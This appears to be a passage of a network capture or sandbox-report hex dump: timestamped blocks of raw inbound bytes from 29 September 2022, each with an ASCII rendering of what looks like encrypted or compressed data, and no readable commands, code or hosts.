                                                                                                                                                2022-09-29 12:51:45 UTC21305INData Raw: 64 06 ed 65 1c 59 7d 6c fd 0b a3 52 eb 05 9b e5 59 f0 ec cf 0b 29 6a de 69 4d f6 36 99 46 a9 e6 f9 36 a9 98 ff a3 b4 fb 06 fe 9b 8c 8b e4 e2 6b 41 77 37 84 01 08 7a 9e 5b f8 11 de 9e 99 57 8f 1e 68 e5 2e e2 ec ae c0 f6 0f e5 d4 80 f2 03 f7 45 b9 55 dc c3 87 b6 cb 89 00 f7 3f 6a 8f 93 ab fa 35 26 04 51 70 24 4f fb a0 c0 d0 82 02 14 9c e7 a6 9b 16 8f be 40 4f 90 a8 b7 2f 44 7c c4 0c 07 cf d1 13 42 87 7b 55 a5 f3 87 7b 6f 94 cb e0 1e 1b 8f c4 c1 b4 b5 f4 4c a4 ad 24 16 cf 6c 71 1c 3e 67 de d2 cc 22 59 58 26 55 db 63 bc ef 24 35 01 ad 1d 28 1c 26 57 ea d3 9b 95 1a 0a 91 b5 6e d0 bb 66 82 e2 d6 57 32 ff 96 98 d2 ac cd 92 43 74 19 d7 56 d6 e9 33 62 db 8d cf 5e e4 5b 6f 7c bb 61 27 da 6a 97 e0 b8 41 15 06 c5 d4 18 93 98 90 24 9f df 81 2a f4 c4 fd 9d 09 2f 62 d5
                                                                                                                                                Data Ascii: deY}lRY)jiM6F6kAw7z[Wh.EU?j5&Qp$O@O/D|B{U{oL$lq>g"YX&Uc$5(&WnfW2CtV3b^[o|a'jA$*/b
                                                                                                                                                2022-09-29 12:51:45 UTC21321INData Raw: 99 8b f9 6a 53 72 d6 de 1c c0 fc 0d 3a 1b 47 4d 92 71 fb 7d 52 a8 26 72 85 8c 81 ab 44 cb 0e fb 95 8e 8f 9d 66 2c 56 4c a7 54 2a 88 83 aa 51 a0 df f9 9d 32 37 15 c2 73 5d a0 7e 06 77 47 32 ed e3 a6 ba e9 96 e0 5d a4 3a 59 23 b4 da e6 9a a4 5a 7d 87 7b 9d a3 45 fb 9d 41 2f 70 f4 67 ec d7 06 b2 ca fa 71 23 c3 0a 92 d6 b6 41 73 3e 45 e0 c0 5e a9 04 e5 5f fc 5f cd 91 8e f8 b2 3f c2 50 39 8f 4c c5 8e a3 ee f5 30 1e 6c db 5e d1 ba 0e a4 dd a1 03 0c 71 03 93 2c 33 67 f1 76 6a 49 08 5d 3b d2 df 60 76 96 4a 88 ad 8f bb 59 66 01 87 c5 1b f4 f2 74 62 d6 59 37 84 b3 2a c6 f2 c8 8b 6b ac 16 85 2d bb 8d 0c 18 1d 0f ec 7a ae b6 03 76 42 25 97 9f d7 07 55 95 2b c2 96 b2 72 42 28 c4 76 d6 fc 3c 4d cd 44 a2 5d c4 12 70 40 a5 5b eb fa e1 9c 3b c9 c2 2b 0c 16 d5 c2 c5 c2 f5
                                                                                                                                                Data Ascii: jSr:GMq}R&rDf,VLT*Q27s]~wG2]:Y#Z}{EA/pgq#As>E^__?P9L0l^q,3gvjI];`vJYftbY7*k-zvB%U+rB(v<MD]p@[;+
                                                                                                                                                2022-09-29 12:51:45 UTC21337INData Raw: c3 78 cf de 65 27 08 86 fe d7 85 55 ac ee f5 de c6 bf 21 13 c5 e1 08 20 6b 3f e3 5b 9a 0e c7 95 d0 b4 cb 94 33 b6 ae 0b 74 90 c2 c2 58 af cb ff c3 fc 59 cf d9 bb c2 c1 96 58 7e e6 67 4d 73 7a 0f 3f d2 8b a6 92 ee ae df 3c 67 f0 9e b9 c1 59 2b 10 ca 32 a7 11 84 dc 7c ea 85 49 c0 8e 5d fc 56 8a cd fe ee cd 58 c3 ce b8 82 9a 37 cf e9 93 fc 3c 04 13 e6 ce 36 19 55 63 cd c6 1c 5f 7e 39 d2 f3 3b 74 b7 77 0f f6 7c f6 4b c4 64 33 84 97 4f 27 03 eb f7 44 4a ca 72 14 ff f9 81 bb 9c 70 f1 86 07 87 4f c8 c4 ad 8a 3f 95 0c cd 21 5c 5d e0 e4 31 e5 95 1c 68 76 50 76 1b 78 61 35 2a cd 80 ae 40 5e 77 93 18 3a db 4f 5e b5 dd 60 1e 18 99 1c 18 f9 5c a2 15 ef f8 41 75 2f 37 93 c3 64 3a f2 b5 d6 9e 93 8c 4c 7f fb 61 6e eb d2 4b 81 a6 36 9c 0c 1a 8e 76 74 9d fd e7 18 4c e2 63
                                                                                                                                                Data Ascii: xe'U! k?[3tXYX~gMsz?<gY+2|I]VX7<6Uc_~9;tw|Kd3O'DJrpO?!\]1hvPvxa5*@^w:O^`\Au/7d:LanK6vtLc
                                                                                                                                                2022-09-29 12:51:45 UTC21353INData Raw: b5 f7 74 fa 92 15 2f 3d e1 98 09 6d 88 04 35 59 42 be aa 09 61 3d 94 6e 7a 0d f7 b9 e7 44 f8 07 f3 88 57 7d 96 5e 63 44 b2 4d 37 95 ce 4f 3f 84 7e 08 e5 ca d6 90 35 28 a5 7c ad 0d 23 37 bc 0a 39 a9 ad 1b e2 96 bd a7 80 ac 71 26 63 67 9e 81 f5 f3 4d b2 0c 4d 15 75 7d 24 f7 f4 dc ce f6 44 72 e9 8c 07 ba 52 e4 d2 99 c2 a9 2b 3f 8e 6e 52 cd fd 19 de 74 df ff 33 76 d1 38 9b 7d 40 06 7b 93 cb 58 c4 99 ed 78 f0 58 26 8a a4 d3 bb 04 05 76 f2 79 3e bd 23 62 b0 4a e0 16 bd aa cd 31 9c 3d 19 7b b8 91 ae 4b c3 38 fe 59 5b 51 5a 28 fb ba d5 5d 99 c2 64 f0 a9 3b 1b a1 ea b4 0a 92 8b 89 3b 3e e2 39 4f 84 e1 93 5a ea e1 42 94 9a d3 e4 ba 41 b3 bf 67 8f ef a7 c9 64 6c e1 52 6e ba cc a0 3e 3b c5 da 3b fd 04 81 9c 9e fa 03 1e d7 65 d6 f1 cd b2 fe d1 a3 1d 31 db f9 97 ff 89
                                                                                                                                                Data Ascii: t/=m5YBa=nzDW}^cDM7O?~5(|#79q&cgMMu}$DrR+?nRt3v8}@{XxX&vy>#bJ1={K8Y[QZ(]d;;>9OZBAgdlRn>;;e1
                                                                                                                                                2022-09-29 12:51:45 UTC21369INData Raw: b0 fe f2 ac a5 fd 2b 5b 05 95 7c ec f4 67 94 c5 8b b5 15 e1 41 7a ec 2b 95 5d c6 91 1b 67 80 c0 ff ec a2 04 97 69 7a 84 ea 60 11 11 4c af d3 82 2c f9 50 49 10 42 20 e4 bb 04 ef 79 1f 44 35 d1 20 40 3b e9 ee 28 4a 8f eb 9a db 30 02 28 30 65 f3 ed 44 01 4d 3a 35 07 29 9d 06 8d 0f fc 12 3c 11 4b 8b 8c 45 8a 49 7a 21 e3 2b a8 a5 d0 31 6a 28 ce a7 51 e8 c8 c2 38 32 cc cf 96 4b 39 09 c7 6a cb 92 61 d9 05 5b 0c b1 5e 57 ec af e0 e3 ea 21 d9 b3 0a 7a 1a fa c4 e5 79 a3 a8 1c 1a f0 72 a1 9f b3 3e 4f d5 8a df d3 15 63 56 2b 41 ea f8 4b 58 ff 6b 77 34 37 63 db 38 ea 92 63 d8 68 25 64 11 60 de 18 d5 66 ab fd 4c b4 31 06 4d 5c 96 33 f5 67 30 f7 d3 3e ea 76 33 94 f8 b2 42 8c 43 2a f2 22 b3 ab 30 65 07 68 09 ec bc 18 1b 5d dc fa 06 9c 51 39 a0 92 c6 1a 0d 46 cc 1f 42 e9
                                                                                                                                                Data Ascii: +[|gAz+]giz`L,PIB yD5 @;(J0(0eDM:5)<KEIz!+1j(Q82K9ja[^W!zyr>OcV+AKXkw47c8ch%d`fL1M\3g0>v3BC*"0eh]Q9FB
                                                                                                                                                2022-09-29 12:51:45 UTC21385INData Raw: ac 7e df 7b 50 15 28 f5 67 7e 92 c5 5c db 9b b6 47 cd e2 b3 c1 31 1c a9 b6 f3 1e ab 5a 89 30 a1 c4 45 73 75 72 cb 8a 6a 37 0f c0 37 8a 9f 9f 41 34 45 07 47 5d 94 a3 0a 18 40 6f 76 5a bc f9 54 a9 03 02 ee dc 6e 57 af f6 5b 58 c8 4f 08 45 f0 cf 64 46 8f 52 8e 9a 94 69 ed b7 4b e1 40 49 c2 a6 e9 3c 11 58 65 27 12 5c 49 61 4f 78 98 a7 bb f5 20 8a 8f ad 1d b1 91 c6 df f5 e8 bd fa c2 9a d3 6a 6d 41 e5 6e f6 54 c0 dc bd 02 8e 44 be 96 85 9c 1d d0 59 d2 f4 a9 59 fe 97 aa 9c 9e e7 72 c6 14 21 dc f5 b5 0a 99 ec 43 ee 3c 20 68 95 c3 63 aa 41 a1 9b fc af 32 05 03 f4 1c 56 c1 a1 2e fc 24 1d 5c 24 88 e6 3b 2c 96 e4 66 69 a4 06 c5 24 f7 46 fd 47 1b a7 ac f6 82 e1 09 20 1c cd ff cd 50 a4 13 b8 50 d8 78 c8 6b ec 57 a1 ee e7 62 1f 8c 32 c0 3b 94 d7 2a 4d db 7d b5 d8 94 15
                                                                                                                                                Data Ascii: ~{P(g~\G1Z0Esurj77A4EG]@ovZTnW[XOEdFRiK@I<Xe'\IaOx jmAnTDYYr!C< hcA2V.$\$;,fi$FG PPxkWb2;*M}
                                                                                                                                                2022-09-29 12:51:45 UTC21401INData Raw: ca 30 62 50 90 b9 72 99 66 be d8 f1 d3 cf 02 af 99 7c ab 3d 27 6b 9b a7 30 16 a4 fd 1a 9d 55 fb 0d e9 f7 7b 40 b8 03 98 26 df 6e 85 e3 65 88 34 29 f7 61 4a ca 97 b0 ea b5 00 30 7d bc 2b 39 90 e9 50 d9 f9 51 79 17 70 b8 13 ae 74 cd 5f 7a 69 54 67 bd 86 db 2e 9c bd be 42 15 7e 18 18 e7 11 09 5b 1b 4e 97 dc e5 9b 8c 31 d7 7b b4 b9 38 50 74 29 c7 8e d4 69 04 0d cc 91 df 2e 90 bb b3 94 03 da 58 43 b6 d4 f2 a8 8b 30 60 f8 82 d1 cd 6d e9 e8 67 fb 4b 69 91 11 32 fd d7 1c 2e 28 f2 c2 33 56 53 72 dc 60 41 c6 41 cc 39 11 80 0c c8 77 1c c4 26 fd 54 5d 8b ac ee 97 4b ef da f4 5e 0a 80 37 39 55 1e 56 a2 39 fb 00 27 5f 75 02 89 b6 a5 15 58 ef f0 e2 48 5b 5b f8 08 4b e1 a3 21 67 dc cc a5 07 e1 11 75 95 b0 33 a7 d3 a1 a0 74 70 e0 e4 01 ad 51 58 e4 54 7d e9 50 0b 57 f1 43
                                                                                                                                                Data Ascii: 0bPrf|='k0U{@&ne4)aJ0}+9PQypt_ziTg.B~[N1{8Pt)i.XC0`mgKi2.(3VSr`AA9w&T]K^79UV9'_uXH[[K!gu3tpQXT}PWC
                                                                                                                                                2022-09-29 12:51:45 UTC21417INData Raw: 76 65 bf 78 7e 79 f6 b7 1c 6d e0 63 ea 1d b8 07 4b 40 e0 c3 cf 34 40 60 5e 9e 23 95 dd 31 d3 20 84 86 19 55 b4 63 4d 60 85 aa 40 b4 e3 41 59 f9 7c 04 c1 e9 c7 84 68 d3 a0 5e bf 37 02 ef c4 f1 73 a7 39 70 d9 1a 8d fa 78 ad b0 1c 26 65 62 7d cd c2 97 7e 1b 30 fe 22 ae c7 10 15 10 bb e4 c7 fd c8 ae f2 56 81 c8 16 03 c7 44 85 5d ee 95 d8 d2 9e d7 b1 cc dc f6 16 82 ad 67 5f ba ac 9f 1a 47 8e 21 f1 dc f3 bb 93 f3 ab 55 26 11 df fa 48 e8 b1 01 87 14 4b fc e0 e1 87 9d 2b 46 df e9 14 b5 a8 59 7f d4 d5 31 ea 7a da 5f 8d 17 48 99 95 01 00 b6 ed a9 1b 32 26 80 64 34 0f b2 33 f1 48 70 e8 f3 8d 69 4f 90 ad f8 81 f8 9a 8d ba 2b 9b 52 c0 42 94 74 b8 8c e7 4a c4 63 7c 39 7f e3 82 87 e0 21 38 e5 e0 ee 15 af a5 ce 0a 5c 84 83 91 28 c8 f7 b7 b5 66 cd 69 6a 4f 4d c9 4f 5b 03
                                                                                                                                                Data Ascii: vex~ymcK@4@`^#1 UcM`@AY|h^7s9px&eb}~0"VD]g_G!U&HK+FY1z_H2&d43HpiO+RBtJc|9!8\(fijOMO[
                                                                                                                                                2022-09-29 12:51:45 UTC21433INData Raw: f7 f5 e3 70 aa 20 29 0c 91 71 9b 55 e4 fd 45 75 29 f5 fc 88 9d a4 58 03 96 80 1e a9 ba 36 b3 11 cd d5 26 04 cd 80 14 1d 85 54 9d 7b 2e d3 57 60 80 33 8c 71 8c c1 64 a2 70 9f 2b 2f a9 25 11 5c aa 6e b5 d0 44 60 42 e4 b2 ea 89 99 d5 1c 06 aa e2 ae 0e da a0 6f 77 5f 1c e7 0c 1d 87 62 56 a2 ea b3 02 63 c9 66 12 cc b6 d5 90 de f2 a8 94 eb b2 5e c3 0a d9 29 0a db 95 5e 74 d8 ba b4 c6 07 02 b3 6f 8a 36 2b 58 b5 f4 c7 7a 8c 15 37 09 22 5d 1c 4d f3 3e 97 85 8d a8 0c 8e a2 80 29 d1 a3 d6 24 2f ed ee bc c6 c5 94 c4 68 3d 21 af fe 3f be c5 29 23 53 8d 49 7c 75 7f 9f 84 7f bb 3c 82 4a 56 20 49 b4 3f 2f 8b 17 97 8e c0 c4 e6 4b b9 99 b8 4c f4 c2 af 96 17 38 72 72 d9 95 b0 37 5f 6f 4f df d9 30 06 ae 7d 62 f4 43 33 7e 37 8c e8 47 69 19 cb ab ac 3a 63 ed 49 da fc 47 96 87
                                                                                                                                                Data Ascii: p )qUEu)X6&T{.W`3qdp+/%\nD`Bow_bVcf^)^to6+Xz7"]M>)$/h=!?)#SI|u<JV I?/KL8rr7_oO0}bC3~7Gi:cIG
                                                                                                                                                2022-09-29 12:51:45 UTC21449INData Raw: af d9 91 11 d6 82 3b f5 19 c5 33 64 84 5f cc 83 6f 8d 57 aa 14 ae 03 1f cf b0 78 d9 cc 57 16 0e cf 20 51 9b 2c a0 15 e0 04 de b3 de a0 20 1d 09 cb e3 3b 1c 04 da 77 16 57 03 45 26 91 52 f2 38 61 b7 a0 08 dc 48 0e b7 1b e2 ef 9a e1 c5 fd de 9e a4 05 12 7e 47 c4 2a 51 8b d3 ff c0 84 4b a9 76 1e 50 9f ee 04 fd 94 94 fc 35 33 84 34 d9 b5 69 2e 72 3d 5a 1d 38 b3 98 c0 78 fe 9c 23 a1 2a 3e 81 2c 96 f1 3e 0a b6 e7 9a 37 f6 ac 19 de 6e 7f 2e 02 e9 bf b6 30 e4 18 58 27 bf 8c 93 09 79 d0 88 11 81 30 1d fd 90 93 46 90 54 35 aa 7e 1d 32 fd ea 20 fb eb 97 6e 2a d3 df a7 15 15 c7 ab af 6f ce 45 fc 42 ec 36 c5 39 f9 c6 2b 3a bf 66 b6 b1 b7 60 b1 54 89 7a c8 a6 11 39 b8 41 c7 d0 38 a5 39 ff a3 68 bc 09 e2 0b a2 00 57 cc 83 e6 dc a6 50 39 aa af 2e 9b 7d f4 c8 41 d4 97 e5
                                                                                                                                                Data Ascii: ;3d_oWxW Q, ;wWE&R8aH~G*QKvP534i.r=Z8x#*>,>7n.0X'y0FT5~2 n*oEB69+:f`Tz9A89hWP9.}A
                                                                                                                                                2022-09-29 12:51:45 UTC21465INData Raw: b0 e0 d2 66 27 8d 57 80 9d 99 dc 15 c5 f7 7c 31 7b 29 d4 63 4a 49 70 39 5d ab 49 9a 98 b2 30 07 c6 63 13 cc e3 5d 44 0c 63 58 ff 7a f4 3d fe 7d 6b c8 ec d2 a1 06 ff 49 e1 a5 e2 88 3d 64 47 71 8f 30 ca 02 cf bb 74 bd 77 37 a4 b9 4d 8c 0d d1 da 8d 98 7b 08 a2 16 25 ce 31 5c 13 a8 18 2e b8 64 5f 09 2c 5d af 62 02 b3 7e 53 4f c2 39 76 15 7c 4b e0 01 3b 49 25 b0 d3 fe d4 80 e6 43 4d 08 7c bc 3a 01 42 53 a8 3e e7 97 e7 ee 16 58 84 32 26 5d 28 5e cf fc 36 70 30 9a 0e 9b bd f0 75 40 07 8b 81 22 06 0a ea e3 27 92 1a 61 ff 49 2b 27 ac 2c 8a 03 5f 30 3f d3 61 3a 4c 57 c8 ab b4 3a 64 c0 53 ac 3d f1 61 a7 57 75 03 56 25 49 8a c6 3e 64 72 ae e8 60 3c 50 4d fb de f6 70 05 94 7d 18 83 34 3a d1 ff ea e4 e8 99 c3 04 9b 9a 69 d0 ab ad 9c 76 e7 16 04 5c 61 d3 d3 38 f2 43 6b
                                                                                                                                                Data Ascii: f'W|1{)cJIp9]I0c]DcXz=}kI=dGq0tw7M{%1\.d_,]b~SO9v|K;I%CM|:BS>X2&](^6p0u@"'aI+',_0?a:LW:dS=aWuV%I>dr`<PMp}4:iv\a8Ck
                                                                                                                                                2022-09-29 12:51:45 UTC21481INData Raw: 8f ae cf be cc 4a 3c c7 29 3e 1f 8e 3c cd 72 bd 88 5b 6d b3 1c e7 f0 b7 04 ae 29 22 61 8b 69 3c 40 04 bb 52 50 09 76 46 6b 9e 94 9e b3 31 f1 07 a2 1c fe 96 c8 bc e4 ac 0f 0c c5 03 66 74 49 13 78 e7 7c dc 4e 1f ae 61 db e4 c5 86 a1 9e 13 23 b5 33 a5 ff 14 de c1 e3 1a 9f 04 66 4d ae 20 f8 76 85 7e 83 47 fc 05 8c ab a6 58 7d d1 fe 55 72 bc 07 7e f5 40 c4 49 88 15 aa ac 7e bf 10 52 89 01 c2 5f e2 92 55 03 db 68 93 6c 65 85 9c 3b 74 5b e9 9a ff fb a5 48 4b b2 cc b2 06 d2 b5 cd c1 05 99 38 63 79 76 70 d3 06 f4 38 06 5d de f3 60 a5 90 15 54 aa 72 1c e7 9b 48 87 de 11 b5 b8 1e 90 60 2f 23 31 45 d9 63 0f 7c 44 28 b0 8d f4 e9 df 6d 20 cf 6e 4e ea 2a 42 fe b1 bb f5 cd 6a d7 3c 83 01 55 a6 78 b3 ea 65 61 59 5c c9 4c 13 79 e6 12 09 5d bf 7a f4 a1 f3 84 8d ae 09 30 cc
                                                                                                                                                Data Ascii: J<)><r[m)"ai<@RPvFk1ftIx|Na#3fM v~GX}Ur~@I~R_Uhle;t[HK8cyvp8]`TrH`/#1Ec|D(m nN*Bj<UxeaY\Ly]z0
                                                                                                                                                2022-09-29 12:51:45 UTC21497INData Raw: c1 5c 42 52 a1 f6 ac 64 ef 76 5a d3 36 f9 5f ed a9 68 47 b0 22 8e 47 33 13 63 86 c9 5e fb 8d 32 d4 b7 5c 3f 8f 94 d8 31 de c9 d3 0f 5a 62 d9 07 1b 7e 0d ea 3c 5a 9b 7c c7 5a 99 9c 98 3c ab cc 3f 7d 1f 13 46 0b ae 1c f1 e8 7d 6a 51 93 00 e2 9d cf b8 01 19 c6 fd 61 5e 9a 3f 39 5e da 2f 2b 2f 5b bd 87 0d 41 00 ba a7 bf 8b 7e ba 6d 1a f8 3e 21 07 31 04 b2 ca bd 64 1e d4 63 2b d6 6f 6e 72 68 c3 5a 9d 8c eb e4 06 e0 98 ac 7d 2c fd ed fb 06 0c 08 41 48 13 04 88 93 0e 36 41 7d b4 61 56 c2 fd 1c 75 4c 00 b3 5e 55 46 c7 05 d7 90 d8 29 6e 7c 24 41 9c f1 7f c1 72 ce 17 f3 60 29 da d8 d5 fa 4a 86 b7 72 b4 18 bd a9 cd d0 85 14 f6 68 9a b4 37 44 99 3a c5 65 75 ff e1 34 bd dc 6f c3 fd 1c 14 13 20 82 fe b1 fa 3c b5 9c a8 80 8d 09 d7 97 00 c7 87 5a 2e 83 98 25 72 5c 27 8b
                                                                                                                                                Data Ascii: \BRdvZ6_hG"G3c^2\?1Zb~<Z|Z<?}F}jQa^?9^/+/[A~m>!1dc+onrhZ},AH6A}aVuL^UF)n|$Ar`)Jrh7D:eu4o <Z.%r\'
                                                                                                                                                2022-09-29 12:51:45 UTC21513INData Raw: e1 97 9c d2 de 61 7c 97 f0 f3 c6 d1 56 a3 3d 02 f2 2d 33 8e 7c 3a 00 84 0a 70 a3 5a 09 77 28 ce 0b d4 d5 25 20 66 c5 6e 0b 2c bd d9 64 71 ec 86 94 af 86 7f 00 f3 5b 14 95 4c f5 9a 2f 2c 07 81 59 ac fc 4c 03 29 22 17 29 1a c3 4f c9 eb b3 10 68 28 3a ba be e7 b3 98 f7 68 2c 8a 60 d9 e5 8b 55 28 7d f2 fc 0c 2f b8 2e a5 37 1d 7e 16 52 ed 40 54 94 fc f8 1e b8 5c b7 ef b7 d6 6e ab 13 e2 8c a3 d5 ce ea 3d 52 cf cd be f9 1f 87 b6 6c b3 8d dc e1 30 22 9c 57 72 ae ed 29 f6 35 77 1a 1a ca a5 75 af c3 64 69 c3 27 61 16 0a 52 37 11 ba e6 c1 0d 61 97 45 f2 cf 75 08 e7 69 09 e0 58 db 0e d6 44 76 29 0c 51 83 d2 04 d7 99 7d da 92 e2 97 15 3b 39 4e 03 37 d4 e8 83 c0 7e 0a 5e 62 9d 28 8d 16 0f c8 2c 90 10 fb 54 95 b1 d1 90 30 53 d1 9d de da 86 53 77 19 c2 0a 00 cc 8d 68 fa
                                                                                                                                                Data Ascii: a|V=-3|:pZw(% fn,dq[L/,YL)")Oh(:h,`U(}/.7~R@T\n=Rl0"Wr)5wudi'aR7aEuiXDv)Q};9N7~^b(,T0SSwh
                                                                                                                                                2022-09-29 12:51:45 UTC21529INData Raw: 59 89 83 3c 61 82 dd 2b af 7e e2 36 4d 5c 30 97 b2 bb 2a ab bd 9c e9 11 3a 9d 15 53 c8 36 a1 34 56 15 25 56 25 c4 21 90 d5 be 02 18 44 e9 94 48 de 3e 0c 03 b6 99 8d c2 5f d7 89 28 d3 50 03 5f b9 38 56 4a b5 da 6e 23 c5 17 13 fe 2f 7c c9 93 0a 6e 60 11 4b 9b 14 0e fb 6d 2f b8 00 66 95 e1 5e fc db 4a b3 52 65 90 5c 28 10 da 72 00 d9 f8 ce 77 14 b8 d2 22 ba 1f 37 0a 79 c9 bd fa 0e 5c 34 41 23 b2 9a 8f 96 5d 79 74 82 ff ea af 32 7d 99 17 5c 57 4f 8c f1 c8 bf 08 67 85 a3 ec be 60 44 60 38 cd d6 24 b8 29 69 b4 fd ed 67 65 b9 54 d3 aa 16 2e 6a f5 05 e3 f3 27 4d cf 65 96 de 95 fe 42 0d 0e c1 8c fe f7 5e 1b 91 aa a9 39 84 d4 b9 eb af 60 d5 82 1a f9 0b 58 8f 54 73 11 de 39 ba 80 1a 46 20 d9 56 1d 98 3d dd cf 13 89 df 8c 46 b0 53 c6 2c 7b 80 a9 42 9e 59 fc c3 19 20
                                                                                                                                                Data Ascii: Y<a+~6M\0*:S64V%V%!DH>_(P_8VJn#/|n`Km/f^JRe\(rw"7y\4A#]yt2}\WOg`D`8$)igeT.j'MeB^9`XTs9F V=FS,{BY
                                                                                                                                                2022-09-29 12:51:45 UTC21545INData Raw: 3d 04 54 24 16 7b 12 3c 62 e3 25 54 c5 06 01 d0 cc 31 b5 b3 29 ba 99 77 3b d7 17 71 59 90 84 58 79 4e ee 07 ae 80 f2 35 89 1a d9 1b ee 9b 32 41 78 ab 1a 07 82 82 ae b1 56 6c 0d 9f e9 52 2d d2 31 cf 2a 51 e2 ff 56 6f 4f 66 cb 52 ed 18 c2 b9 fa d8 13 6d ea 3a 80 5e 90 2e d7 f8 19 83 28 f9 e5 0f bc 39 69 9e 47 fd 51 11 64 b4 5d 99 f1 d8 85 50 0b e5 fa 7f 95 f9 d8 d0 ea 9a 44 71 50 4c 45 5a bd b6 b1 6c f2 56 ae ca d7 52 13 77 e7 53 d0 6c 48 3d 53 6b ec 00 9c 97 36 b5 71 17 a2 2b 54 d9 61 45 8b 8a 88 86 36 19 10 01 15 fb db 4d cb 62 2c 04 3f 51 67 2b 1b e5 51 0e b8 f8 2a 40 5f 6c 19 0a f0 c0 c9 70 83 0d 3d a6 f6 7e c8 f5 4d 11 cb 27 4f 99 ff 1e 54 1f 38 91 b5 43 e9 59 2a 20 c8 dc 39 b7 b4 05 a3 a8 db 62 d5 8e b8 06 3a e5 cd 84 4d 83 a9 70 5a f7 e7 61 30 08 d6
                                                                                                                                                Data Ascii: =T${<b%T1)w;qYXyN52AxVlR-1*QVoOfRm:^.(9iGQd]PDqPLEZlVRwSlH=Sk6q+TaE6Mb,?Qg+Q*@_lp=~M'OT8CY* 9b:MpZa0
                                                                                                                                                2022-09-29 12:51:45 UTC21561INData Raw: e0 84 04 02 72 5f 04 a7 2f 53 90 67 9b 65 35 f8 c4 b5 a6 b6 6a 66 6c 90 47 40 39 65 db 18 ee 70 29 25 ed 09 29 23 4f e7 75 8d 69 44 e7 44 13 ae 8c d5 9e 15 20 d3 54 f5 dd c6 a6 22 06 ae eb d7 34 15 3a 1e ff d3 88 12 fa 56 f8 73 b4 f9 cd cb df 5d ca 5e e5 01 98 70 0e cc 21 66 33 cc fb d9 26 31 ad 39 18 fc 8e 3a 12 e5 73 17 12 91 a3 46 cd 5b 08 23 fe 3d a3 5d 98 f0 ba ae e3 2f 0b 1f 7e c3 92 76 b4 60 4c 66 54 ee a2 b0 8e 33 fc 93 b3 32 32 5c b2 2a f3 8f af a6 ba 5a 00 3e 1c 1a 02 ac e3 c2 8b b6 07 16 10 6e 39 9b 19 e8 20 bf d8 e6 91 35 83 87 dc 7b 23 f8 13 f0 d2 79 21 b6 2b 22 b5 40 e3 64 a9 21 70 b4 4f 3d f7 e4 46 90 2a 54 81 ec c1 b8 04 42 e9 f0 62 cc 89 6d ca 79 ce 46 4d f4 51 88 c9 73 09 5f f1 01 b9 0f d0 8c 6d 14 c1 62 d2 90 17 da d4 5c f2 bd 66 52 47
                                                                                                                                                Data Ascii: r_/Sge5jflG@9ep)%)#OuiDD T"4:Vs]^p!f3&19:sF[#=]/~v`LfT322\*Z>n9 5{#y!+"@d!pO=F*TBbmyFMQs_mb\fRG
                                                                                                                                                2022-09-29 12:51:45 UTC21577INData Raw: 8b ff b6 da 85 d9 e4 34 90 7c 56 c8 9c 25 67 71 12 da bd 18 33 da c0 d7 b3 cb 4f c2 d3 0a a2 e2 d1 26 fb 80 b6 4b d7 ba 9d 5b 6f c8 61 89 5b 18 38 9b e4 af 67 67 e6 12 f8 84 ef 2c fe bd bb d9 9b 5b de dc fa 2f a9 20 29 9e 40 d0 d5 c2 28 93 17 f7 e2 84 7b 0c 15 4c ad 82 b5 4a cc 53 f5 5e 2e b2 d9 41 f2 4f 0f 20 c8 94 95 32 82 a8 1b 40 59 a0 ff d2 ce 0e 0f 67 34 dc 68 a2 57 4d a7 e8 43 ba 7e 04 c1 d5 e1 8e 09 29 5a 33 2d 09 75 6a 34 7e 18 b2 28 90 0e 80 5e a6 85 2d 37 f0 4f db b8 f7 24 26 01 39 c8 99 19 43 85 ae 31 06 1e bc ec ac 37 88 ad 52 8b 6b 3b 53 af d9 9e 34 c6 59 a8 3e 76 c7 d7 1a 35 b8 f5 7a b7 94 83 88 15 ba da fd eb d7 78 19 26 ad 65 6f fc e0 e6 aa 0a 8c 42 a5 c5 67 a8 04 38 6c b5 a8 21 4e 61 db d0 69 ae ae 92 3c 1d e0 62 f1 67 4e 82 15 ee e0 17
                                                                                                                                                Data Ascii: 4|V%gq3O&K[oa[8gg,[/ )@({LJS^.AO 2@Yg4hWMC~)Z3-uj4~(^-7O$&9C17Rk;S4Y>v5zx&eoBg8l!Nai<bgN
                                                                                                                                                2022-09-29 12:51:45 UTC21593INData Raw: 8e a0 8b 94 46 78 a9 b0 f0 7e 1e be 89 5d 18 50 0b a7 8a d8 b9 75 d6 c2 c5 f4 d0 38 f7 2e d3 a6 78 a8 ab c4 54 fc fb 31 25 60 14 48 40 e3 2a 85 04 25 30 76 e4 be 41 b6 d8 44 23 7d d1 e4 27 cb df 76 6c de a4 64 8d c9 84 bd 41 2b 11 ba 77 05 08 cb 32 20 3f f8 95 3d 92 06 e8 bb 3b 36 52 18 3a 2e 79 46 76 33 8d 28 cf 2e 97 ca e1 7e be 7b dd f8 57 06 75 e1 76 3e 9b 83 60 c3 82 0d ae b0 29 c0 ed a4 58 78 ba 18 cc 6a 6c 21 cf 95 e2 ce 65 f8 b7 3c fc 75 d0 b0 93 b3 d0 e3 63 fe 66 80 c5 6d 5b f4 13 f9 f6 ae 3d af 54 0a 87 c6 4b c9 a9 54 c4 81 d7 e6 57 b7 a3 f4 7d d1 62 37 ea b1 1d 87 4f 0b 94 8a f5 5a 5a 6d 33 b5 ab 27 2c c9 d5 4a a1 c9 ef ce 4b bd a2 d6 61 1e 63 bb d0 32 42 5f 3c b0 85 d3 15 c0 da 44 6b c0 53 89 89 5e 1f f4 85 89 55 2e 4c 37 12 38 9e fc bf ab cf
                                                                                                                                                Data Ascii: Fx~]Pu8.xT1%`H@*%0vAD#}'vldA+w2 ?=;6R:.yFv3(.~{Wuv>`)Xxjl!e<ucfm[=TKTW}b7OZZm3',JKac2B_<DkS^U.L78
